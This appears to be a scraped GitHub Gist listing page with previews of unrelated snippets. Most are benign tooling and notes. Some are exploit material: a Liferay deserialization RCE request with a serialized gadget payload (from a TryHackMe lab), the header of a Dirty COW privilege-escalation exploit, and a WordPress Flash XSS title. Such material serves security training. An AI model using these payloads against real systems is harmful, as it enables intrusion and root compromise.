Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Juanan Pereira juananpe

🎯
Focusing
View GitHub Profile
@CMNatic
CMNatic / cloudSettings
Last active Jan 5, 2022
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
View cloudSettings
{"lastUpload":"2021-08-31T08:20:42.057Z","extensionVersion":"v3.4.3"}
View LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@oseiskar
oseiskar / swagger-yaml-to-html.py
Last active Apr 7, 2022
Converts Swagger YAML to a static HTML document (needs: pip install PyYAML)
View swagger-yaml-to-html.py
#!/usr/bin/python
#
# Copyright 2017 Otto Seiskari
# Licensed under the Apache License, Version 2.0.
# See http://www.apache.org/licenses/LICENSE-2.0 for the full text.
#
# This file is based on
# https://github.com/swagger-api/swagger-ui/blob/4f1772f6544699bc748299bd65f7ae2112777abc/dist/index.html
# (Copyright 2017 SmartBear Software, Licensed under Apache 2.0)
#
@KrE80r
KrE80r / c0w.c
Created Oct 23, 2016
PTRACE_POKEDATA variant of CVE-2016-5195
View c0w.c
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@cure53
cure53 / wordpress.md
Last active Jan 16, 2022
WordPress Flash XSS in flashmediaelement.swf
View wordpress.md
@primaryobjects
primaryobjects / linear-regression.Rmd
Last active Nov 13, 2018
Single variable linear regression, calculating baseline prediction, SSE, SST, R^2 of the model.
View linear-regression.Rmd
---
title: "Single Variable Linear Regression R^2"
output: html_document
---
The following figure shows three data points and the best fit line:
y = 3x + 2.
The x-coordinate, or "x", is our independent variable and the y-coordinate, or "y", is our dependent variable.
View jq-cheetsheet.md

Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.

Installing jq

On Mac OS

brew install jq

@tunelko
tunelko / weird_encodings.py
Last active Jan 10, 2020
weird_encodings
View weird_encodings.py
import base64
import sys
pt = sys.argv[1]
type_encoding = sys.argv[2]
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
@bgun
bgun / gist:c7447ab0906517221b6b
Last active Apr 18, 2021
Practicing with IntelliJ and Git
View gist:c7447ab0906517221b6b

Practicing with IntelliJ and Git

For the things we have to learn before we can do them,
we learn by doing them. ― Aristotle

This exercise is a straightforward recipe for starting a new IntelliJ project, adding a code file, and marrying a local Git repository to a remote GitHub repository. Even if you are comfortable with your Git workflow, you should go through this and understand what is happening - and more specifically, where on your computer's hard drive and on GitHub it is happening.

Repeat this exercise a few times, until you're comfortable. You don't have to memorize each command - that's what cheat sheets are for! - but rather, focus on understanding their relationships to the files on your computer, your development environment (IntelliJ), and GitHub.

Create a new IntelliJ project.

@owainlewis
owainlewis / java7.yml
Created Jul 24, 2013
Install Java 7 with Ansible on Ubuntu Linux
View java7.yml
---
- name: ensure required packages are installed for Java 7
apt: name=$item state=latest update_cache=yes
with_items:
- python-software-properties
- name: Add Java repository to sources
action: apt_repository repo='ppa:webupd8team/java'